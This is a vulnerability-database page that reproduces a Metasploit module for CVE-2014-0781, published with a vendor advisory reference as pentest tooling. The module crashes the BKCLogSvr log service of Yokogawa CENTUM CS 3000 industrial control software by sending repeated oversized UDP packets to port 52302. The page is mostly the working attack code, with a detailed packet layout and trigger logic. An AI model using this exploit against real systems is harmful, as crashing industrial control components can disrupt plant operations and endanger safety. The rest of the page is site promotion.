Lucene search
K

Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow

🗓️ 10 Mar 2014 15:12:20Reported by juan vazquez <[email protected]>, Redsadic <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 42 Views

Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow exploitation through Metasploit modul

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow',
      'Description'    => %q{
        This module abuses a buffer overflow vulnerability to trigger a Denial of Service
        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability
        exists in the handling of malformed log packets, with an unexpected long level field.
        The root cause of the vulnerability is a combination of usage of uninitialized memory
        from the stack and a dangerous string copy. This module has been tested successfully
        on Yokogawa CENTUM CS 3000 R3.08.50.
      },
      'Author'         =>
        [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
          [ 'URL', 'http://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],
          [ 'CVE', '2014-0781']
        ],
      'DisclosureDate' => '2014-03-10',
    ))

    register_options(
      [
        Opt::RPORT(52302),
        OptInt.new('RLIMIT', [true,  "Number of packets to send", 10])
      ])
  end

  def run
    if datastore['RLIMIT'] < 2
      print_error("Two consecutive packets are needed to trigger the DoS condition. Please increment RLIMIT.")
      return
    end

    # Crash due to read bad memory
    test = [1024].pack("V")             # packet length
    test << "AAAA"                      # Unknown
    test << "SOURCE\x00\x00"            # Source
    test << "\x00" * 8                  # Padding
    test << "B" * (1024 - test.length)  # Level & Message coalesced

    connect_udp

    # Sending two consecutives packages is enough to
    # trigger the overflow and cause the DoS. But if
    # legit packets are processed by the server, between
    # the two malformed packages, overflow won't happen.
    # Unfortunately because of the usage of UDP and the
    # absence of answer, there isn't a reliable way to
    # check if the DoS condition has been triggered.
    print_status("Sending #{datastore['RLIMIT']} packets...")
    (1..datastore['RLIMIT']).each do |i|
      vprint_status("Sending #{i}/#{datastore['RLIMIT']}...")
      udp_sock.put(test)
    end

    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation